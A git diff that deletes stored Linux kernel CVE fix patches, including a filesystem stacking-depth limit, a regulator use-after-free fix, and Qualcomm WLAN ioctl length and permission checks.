-diff --git a/fs/sdcardfs/main.c b/fs/sdcardfs/main.c
-index a6522286d7314..8b51a124298f4 100755
---- a/fs/sdcardfs/main.c
-+++ b/fs/sdcardfs/main.c
-@@ -223,6 +223,13 @@ static int sdcardfs_read_super(struct super_block *sb, const char *dev_name,
- 	atomic_inc(&lower_sb->s_active);
- 	sdcardfs_set_lower_super(sb, lower_sb);
- 
-+	sb->s_stack_depth = lower_sb->s_stack_depth + 1;
-+	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
-+		pr_err("sdcardfs: maximum fs stacking depth exceeded\n");
-+		err = -EINVAL;
-+		goto out_sput;
-+	}
-+
- 	/* inherit maxbytes from lower file system */
- 	sb->s_maxbytes = lower_sb->s_maxbytes;
- 
diff --git a/Patches/Linux_CVEs/CVE-2014-9922/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9922/ANY/0001.patch
deleted file mode 100644
index 3d396a88..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9922/ANY/0001.patch
+++ /dev/null
@@ -1,92 +0,0 @@
-From 69c433ed2ecd2d3264efd7afec4439524b319121 Mon Sep 17 00:00:00 2001
-From: Miklos Szeredi <mszeredi@suse.cz>
-Date: Fri, 24 Oct 2014 00:14:39 +0200
-Subject: fs: limit filesystem stacking depth
-
-Add a simple read-only counter to super_block that indicates how deep this
-is in the stack of filesystems.  Previously ecryptfs was the only stackable
-filesystem and it explicitly disallowed multiple layers of itself.
-
-Overlayfs, however, can be stacked recursively and also may be stacked
-on top of ecryptfs or vice versa.
-
-To limit the kernel stack usage we must limit the depth of the
-filesystem stack.  Initially the limit is set to 2.
-
-Signed-off-by: Miklos Szeredi <mszeredi@suse.cz>
----
- fs/ecryptfs/main.c   |  7 +++++++
- fs/overlayfs/super.c |  9 +++++++++
- include/linux/fs.h   | 11 +++++++++++
- 3 files changed, 27 insertions(+)
-
-diff --git a/fs/ecryptfs/main.c b/fs/ecryptfs/main.c
-index 1b119d3..c4cd1fd 100644
---- a/fs/ecryptfs/main.c
-+++ b/fs/ecryptfs/main.c
-@@ -566,6 +566,13 @@ static struct dentry *ecryptfs_mount(struct file_system_type *fs_type, int flags
- 	s->s_maxbytes = path.dentry->d_sb->s_maxbytes;
- 	s->s_blocksize = path.dentry->d_sb->s_blocksize;
- 	s->s_magic = ECRYPTFS_SUPER_MAGIC;
-+	s->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
-+
-+	rc = -EINVAL;
-+	if (s->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
-+		pr_err("eCryptfs: maximum fs stacking depth exceeded\n");
-+		goto out_free;
-+	}
- 
- 	inode = ecryptfs_get_inode(path.dentry->d_inode, s);
- 	rc = PTR_ERR(inode);
-diff --git a/fs/overlayfs/super.c b/fs/overlayfs/super.c
-index 7dcc24e..08b704c 100644
---- a/fs/overlayfs/super.c
-+++ b/fs/overlayfs/super.c
-@@ -677,6 +677,15 @@ static int ovl_fill_super(struct super_block *sb, void *data, int silent)
- 	}
- 	ufs->lower_namelen = statfs.f_namelen;
- 
-+	sb->s_stack_depth = max(upperpath.mnt->mnt_sb->s_stack_depth,
-+				lowerpath.mnt->mnt_sb->s_stack_depth) + 1;
-+
-+	err = -EINVAL;
-+	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
-+		pr_err("overlayfs: maximum fs stacking depth exceeded\n");
-+		goto out_put_workpath;
-+	}
-+
- 	ufs->upper_mnt = clone_private_mount(&upperpath);
- 	err = PTR_ERR(ufs->upper_mnt);
- 	if (IS_ERR(ufs->upper_mnt)) {
-diff --git a/include/linux/fs.h b/include/linux/fs.h
-index 69118b3..4e41a4a 100644
---- a/include/linux/fs.h
-+++ b/include/linux/fs.h
-@@ -261,6 +261,12 @@ struct iattr {
-  */
- #include <linux/quota.h>
- 
-+/*
-+ * Maximum number of layers of fs stack.  Needs to be limited to
-+ * prevent kernel stack overflow
-+ */
-+#define FILESYSTEM_MAX_STACK_DEPTH 2
-+
- /** 
-  * enum positive_aop_returns - aop return codes with specific semantics
-  *
-@@ -1273,6 +1279,11 @@ struct super_block {
- 	struct list_lru		s_dentry_lru ____cacheline_aligned_in_smp;
- 	struct list_lru		s_inode_lru ____cacheline_aligned_in_smp;
- 	struct rcu_head		rcu;
-+
-+	/*
-+	 * Indicates how deep in a filesystem stack this SB is
-+	 */
-+	int s_stack_depth;
- };
- 
- extern struct timespec current_fs_time(struct super_block *sb);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9940/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9940/ANY/0001.patch
deleted file mode 100644
index 1ea5321b..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9940/ANY/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From 60a2362f769cf549dc466134efe71c8bf9fbaaba Mon Sep 17 00:00:00 2001
-From: Seung-Woo Kim <sw0312.kim@samsung.com>
-Date: Thu, 4 Dec 2014 19:17:17 +0900
-Subject: regulator: core: Fix regualtor_ena_gpio_free not to access pin after
- freeing
-
-After freeing pin from regulator_ena_gpio_free, loop can access
-the pin. So this patch fixes not to access pin after freeing.
-
-Signed-off-by: Seung-Woo Kim <sw0312.kim@samsung.com>
-Signed-off-by: Mark Brown <broonie@kernel.org>
----
- drivers/regulator/core.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
-index df2af3a..47a455c 100644
---- a/drivers/regulator/core.c
-+++ b/drivers/regulator/core.c
-@@ -1713,6 +1713,8 @@ static void regulator_ena_gpio_free(struct regulator_dev *rdev)
- 				gpiod_put(pin->gpiod);
- 				list_del(&pin->list);
- 				kfree(pin);
-+				rdev->ena_pin = NULL;
-+				return;
- 			} else {
- 				pin->request_count--;
- 			}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0569/prima/0002.patch b/Patches/Linux_CVEs/CVE-2015-0569/prima/0002.patch
deleted file mode 100644
index 940d5f7c..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0569/prima/0002.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 0ffca4f7bca3a8157d8dbaddbcea292c267fb5aa Mon Sep 17 00:00:00 2001
-From: Mahesh A Saptasagar <c_msapta@qti.qualcomm.com>
-Date: Tue, 27 Oct 2015 15:40:18 +0530
-Subject: wlan: Address buffer overflow due to invalid length
-
-Check for valid length before copying the packet filter data from
-userspace buffer to kernel space buffer to avoid buffer overflow
-issue.
-
-Change-Id: I9548727543b903b5eaafa25c6184615d511ca99d
-CRs-Fixed: 930533
----
- CORE/HDD/src/wlan_hdd_wext.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index c38563d..79dde24 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -8401,6 +8401,9 @@ int wlan_hdd_set_filter(hdd_context_t *pHddCtx, tpPacketFilterCfg pRequest,
- 
-                 hddLog(VOS_TRACE_LEVEL_INFO, "Data Offset %d Data Len %d",
-                         pRequest->paramsData[i].dataOffset, pRequest->paramsData[i].dataLength);
-+                if ((sizeof(packetFilterSetReq.paramsData[i].compareData)) <
-+                    (pRequest->paramsData[i].dataLength))
-+                    return -EINVAL;
- 
-                 memcpy(&packetFilterSetReq.paramsData[i].compareData,
-                         pRequest->paramsData[i].compareData, pRequest->paramsData[i].dataLength);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0569/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2015-0569/qcacld-2.0/0001.patch
deleted file mode 100644
index 4eb29650..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0569/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From a079d716b5481223f0166c644e9ec7c75a31b02c Mon Sep 17 00:00:00 2001
-From: Mahesh A Saptasagar <c_msapta@qti.qualcomm.com>
-Date: Tue, 27 Oct 2015 19:25:49 +0530
-Subject: qcacld 2.0: Address buffer overflow due to invalid length
-
-prima to qcacld-2.0 propagation
-
-Check for valid length before copying the packet filter data from
-userspace buffer to kernel space buffer to avoid buffer overflow
-issue.
-
-Change-Id: I9548727543b903b5eaafa25c6184615d511ca99d
-CRs-Fixed: 930533
----
- CORE/HDD/src/wlan_hdd_wext.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 91809f8..668cd1d 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -9741,6 +9741,9 @@ int wlan_hdd_set_filter(hdd_context_t *pHddCtx, tpPacketFilterCfg pRequest,
- 
-                 hddLog(VOS_TRACE_LEVEL_INFO, "Data Offset %d Data Len %d",
-                         pRequest->paramsData[i].dataOffset, pRequest->paramsData[i].dataLength);
-+                if ((sizeof(packetFilterSetReq.paramsData[i].compareData)) <
-+                           (pRequest->paramsData[i].dataLength))
-+                    return -EINVAL;
- 
-                 memcpy(&packetFilterSetReq.paramsData[i].compareData,
-                         pRequest->paramsData[i].compareData, pRequest->paramsData[i].dataLength);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0570/prima/0002.patch b/Patches/Linux_CVEs/CVE-2015-0570/prima/0002.patch
deleted file mode 100644
index dd60cf10..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0570/prima/0002.patch
+++ /dev/null
@@ -1,175 +0,0 @@
-From 606babd474290e84e5a86f94480f62f4a5ff92ac Mon Sep 17 00:00:00 2001
-From: Mahesh A Saptasagar <c_msapta@qti.qualcomm.com>
-Date: Tue, 27 Oct 2015 15:13:46 +0530
-Subject: wlan: Validate ioctls for valid input length
-
-Return failure to applications if ioctl is invoked with arguments
-of improper length.
-
-Change-Id: I01589f37996510ee130485ef43e1f36811692e28
-CRs-Fixed: 930542
----
- CORE/HDD/src/wlan_hdd_hostapd.c | 60 ++++++++++++++++++++++++++++++++---------
- 1 file changed, 47 insertions(+), 13 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c
-index bdee270..dffcc05 100644
---- a/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -3958,9 +3958,8 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-          case DOT11F_EID_WPA: 
-             if (wps_genie[1] < 2 + 4)
-             {
--               vos_mem_free(pSap_WPSIe); 
--               kfree(fwps_genie);
--               return -EINVAL;
-+               ret = -EINVAL;
-+               goto exit;
-             }
-             else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0) 
-             {
-@@ -4018,6 +4017,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2; 
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+                      if (length > sizeof(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E))
-+                      {
-+                          ret = -EINVAL;
-+                          goto exit;
-+                      }
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_UUIDE_PRESENT; 
-                       pos += length;
-@@ -4032,9 +4036,8 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-                    
-                    default:
-                       hddLog (LOGW, "UNKNOWN TLV in WPS IE(%x)", (*pos<<8 | *(pos+1)));
--                      vos_mem_free(pSap_WPSIe);
--                      kfree(fwps_genie);
--                      return -EINVAL; 
-+                      ret = -EINVAL;
-+                      goto exit;
-                 }
-               }  
-             }
-@@ -4046,9 +4049,8 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-                  
-          default:
-             hddLog (LOGE, "%s Set UNKNOWN IE %X",__func__, wps_genie[0]);
--            vos_mem_free(pSap_WPSIe);
--            kfree(fwps_genie);
--            return 0;
-+            ret = -EINVAL;
-+            goto exit;
-       }
-     } 
-     else if( wps_genie[0] == eQC_WPS_PROBE_RSP_IE)
-@@ -4060,9 +4062,8 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-          case DOT11F_EID_WPA: 
-             if (wps_genie[1] < 2 + 4)
-             {
--               vos_mem_free(pSap_WPSIe); 
--               kfree(fwps_genie);
--               return -EINVAL;
-+                ret = -EINVAL;
-+                goto exit;
-             }
-             else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0) 
-             {
-@@ -4126,6 +4127,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2; 
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E)))
-+                      {
-+                          ret = -EINVAL;
-+                          goto exit;
-+                      }
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_UUIDE_PRESENT;
-                       pos += length;
-@@ -4135,6 +4141,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+                      if (length >  (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name)))
-+                      {
-+                          ret = -EINVAL;
-+                          goto exit;
-+                      }
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.num_name = length;
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MANUFACTURE_PRESENT;
-@@ -4145,6 +4156,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text)))
-+                      {
-+                          ret = -EINVAL;
-+                          goto exit;
-+                      }
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.num_text = length;
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MODELNAME_PRESENT;
-@@ -4154,6 +4170,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text)))
-+                      {
-+                          ret = -EINVAL;
-+                          goto exit;
-+                      }
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.num_text = length;
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MODELNUMBER_PRESENT;
-@@ -4163,6 +4184,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text)))
-+                      {
-+                          ret = -EINVAL;
-+                          goto exit;
-+                      }
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.num_text = length;
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_SERIALNUMBER_PRESENT;
-@@ -4186,6 +4212,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text)))
-+                      {
-+                          ret = -EINVAL;
-+                          goto exit;
-+                      }
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.num_text = length;
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text, pos, length);
-                       pos += length;
-@@ -4217,6 +4248,8 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-       } // switch
-     }
-     halStatus = WLANSAP_Set_WpsIe(pVosContext, pSap_WPSIe);
-+    if (halStatus != eHAL_STATUS_SUCCESS)
-+        ret = -EINVAL;
-     pHostapdState = WLAN_HDD_GET_HOSTAP_STATE_PTR(pHostapdAdapter);
-     if( pHostapdState->bCommit && WPSIeType == eQC_WPS_PROBE_RSP_IE)
-     {
-@@ -4225,10 +4258,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-         WLANSAP_Update_WpsIe ( pVosContext );
-     }
-  
-+exit:
-     vos_mem_free(pSap_WPSIe);   
-     kfree(fwps_genie);
-     EXIT();
--    return halStatus;
-+    return ret;
- }
- 
- static int iw_softap_setwpsie(struct net_device *dev,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0570/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2015-0570/qcacld-2.0/0001.patch
deleted file mode 100644
index ab87e188..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0570/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,178 +0,0 @@
-From 8bd73c3452ab22ba9bdbaac5ab12de2ed25fcb9d Mon Sep 17 00:00:00 2001
-From: Mahesh A Saptasagar <c_msapta@qti.qualcomm.com>
-Date: Tue, 27 Oct 2015 21:56:28 +0530
-Subject: qcacld 2.0: Validate ioctls for valid input length
-
-prima to qcacld-2.0 propagation
-
-Return failure to applications if ioctl is invoked with arguments
-of improper length.
-
-Change-Id: I01589f37996510ee130485ef43e1f36811692e28
-CRs-Fixed: 930542
----
- CORE/HDD/src/wlan_hdd_hostapd.c | 61 +++++++++++++++++++++++++++++++----------
- 1 file changed, 47 insertions(+), 14 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c
-index 881400e..e4e1a63 100644
---- a/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -5186,9 +5186,8 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-          case DOT11F_EID_WPA:
-             if (wps_genie[1] < 2 + 4)
-             {
--               vos_mem_free(pSap_WPSIe);
--               kfree(fwps_genie);
--               return -EINVAL;
-+                ret = -EINVAL;
-+                goto exit;
-             }
-             else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0)
-             {
-@@ -5246,6 +5245,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+                      if (length > sizeof(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E))
-+                      {
-+                          ret = -EINVAL;
-+                          goto exit;
-+                      }
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_UUIDE_PRESENT;
-                       pos += length;
-@@ -5260,9 +5264,8 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- 
-                    default:
-                       hddLog (LOGW, "UNKNOWN TLV in WPS IE(%x)", (*pos<<8 | *(pos+1)));
--                      vos_mem_free(pSap_WPSIe);
--                      kfree(fwps_genie);
--                      return -EINVAL;
-+                      ret = -EINVAL;
-+                      goto exit;
-                 }
-               }
-             }
-@@ -5274,9 +5277,8 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- 
-          default:
-             hddLog (LOGE, "%s Set UNKNOWN IE %X",__func__, wps_genie[0]);
--            vos_mem_free(pSap_WPSIe);
--            kfree(fwps_genie);
--            return 0;
-+            ret = -EINVAL;
-+            goto exit;
-       }
-     }
-     else if( wps_genie[0] == eQC_WPS_PROBE_RSP_IE)
-@@ -5288,9 +5290,8 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-          case DOT11F_EID_WPA:
-             if (wps_genie[1] < 2 + 4)
-             {
--               vos_mem_free(pSap_WPSIe);
--               kfree(fwps_genie);
--               return -EINVAL;
-+                ret = -EINVAL;
-+                goto exit;
-             }
-             else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0)
-             {
-@@ -5354,6 +5355,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E)))
-+                      {
-+                          ret = -EINVAL;
-+                          goto exit;
-+                      }
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_UUIDE_PRESENT;
-                       pos += length;
-@@ -5363,6 +5369,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+                      if (length >  (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name)))
-+                      {
-+                          ret = -EINVAL;
-+                          goto exit;
-+                      }
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.num_name = length;
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MANUFACTURE_PRESENT;
-@@ -5373,6 +5384,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text)))
-+                      {
-+                          ret = -EINVAL;
-+                          goto exit;
-+                      }
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.num_text = length;
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MODELNAME_PRESENT;
-@@ -5382,6 +5398,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text)))
-+                      {
-+                          ret = -EINVAL;
-+                          goto exit;
-+                      }
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.num_text = length;
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MODELNUMBER_PRESENT;
-@@ -5391,6 +5412,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text)))
-+                      {
-+                          ret = -EINVAL;
-+                          goto exit;
-+                      }
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.num_text = length;
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_SERIALNUMBER_PRESENT;
-@@ -5414,6 +5440,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text)))
-+                      {
-+                          ret = -EINVAL;
-+                          goto exit;
-+                      }
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.num_text = length;
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text, pos, length);
-                       pos += length;
-@@ -5450,6 +5481,8 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- #else
-     halStatus = WLANSAP_Set_WpsIe(pVosContext, pSap_WPSIe);
- #endif
-+    if (halStatus != eHAL_STATUS_SUCCESS)
-+        ret = -EINVAL;
-     pHostapdState = WLAN_HDD_GET_HOSTAP_STATE_PTR(pHostapdAdapter);
-     if( pHostapdState->bCommit && WPSIeType == eQC_WPS_PROBE_RSP_IE)
-     {
-@@ -5461,11 +5494,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-         WLANSAP_Update_WpsIe ( pVosContext );
- #endif
-     }
--
-+exit:
-     vos_mem_free(pSap_WPSIe);
-     kfree(fwps_genie);
-     EXIT();
--    return halStatus;
-+    return ret;
- }
- 
- static int iw_softap_setwpsie(struct net_device *dev,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0001.patch
deleted file mode 100644
index 27955d7c..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From 6feb2faf80a05940618aa2eef2b62e4e2e54f148 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma <mukul@qti.qualcomm.com>
-Date: Tue, 27 Oct 2015 23:42:45 +0530
-Subject: wlan:Check priviledge permission before processing SET_OEM_DATA_REQ
- IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_OEM_DATA_REQ IOCTLs, making
-sure user task has right permission to process the command.
-
-Change-Id: Ida0133304b00627d01ef7f85f5b15ed9d404d443
-CRs-Fixed: 930549
----
- CORE/HDD/src/wlan_hdd_oemdata.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_oemdata.c b/CORE/HDD/src/wlan_hdd_oemdata.c
-index 17e3689..1aef257 100644
---- a/CORE/HDD/src/wlan_hdd_oemdata.c
-+++ b/CORE/HDD/src/wlan_hdd_oemdata.c
-@@ -200,6 +200,12 @@ static int __iw_set_oem_data_req(struct net_device *dev,
- 
-     ENTER();
- 
-+    if (!capable(CAP_NET_ADMIN)) {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                  FL("permission check failed"));
-+        return -EPERM;
-+    }
-+
-     if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
-     {
-        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0002.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0002.patch
deleted file mode 100644
index ddf971b2..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0002.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From fe4208157c899a5de4d6769d13f6620fc32ebfa9 Mon Sep 17 00:00:00 2001
-From: Hanumantha Reddy Pothula <c_hpothu@qti.qualcomm.com>
-Date: Thu, 29 Oct 2015 12:13:38 +0530
-Subject: wlan:Check priviledge permission for SET_CHANNEL_RANGE
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_CHANNEL_RANGE IOCTL,
-making sure user task has right permission to process the command.
-
-Change-Id: I48bcd55bee45203667bcc679db4ad96aa9e04b7c
-CRs-Fixed: 930555
----
- CORE/HDD/src/wlan_hdd_hostapd.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c
-index 270f5e1..c6cce50 100644
---- a/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -4231,6 +4231,12 @@ static int wlan_hdd_set_force_acs_ch_range(struct net_device *dev,
- 	hdd_context_t *hdd_ctx = WLAN_HDD_GET_CTX(adapter);
- 	int *value = (int *)extra;
- 
-+	if (!capable(CAP_NET_ADMIN)) {
-+		VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+			  FL("permission check failed"));
-+		return -EPERM;
-+	}
-+
- 	if (wlan_hdd_validate_operation_channel(adapter, value[0]) !=
- 					 VOS_STATUS_SUCCESS ||
- 		wlan_hdd_validate_operation_channel(adapter, value[1]) !=
--- 
-cgit v1.1
-
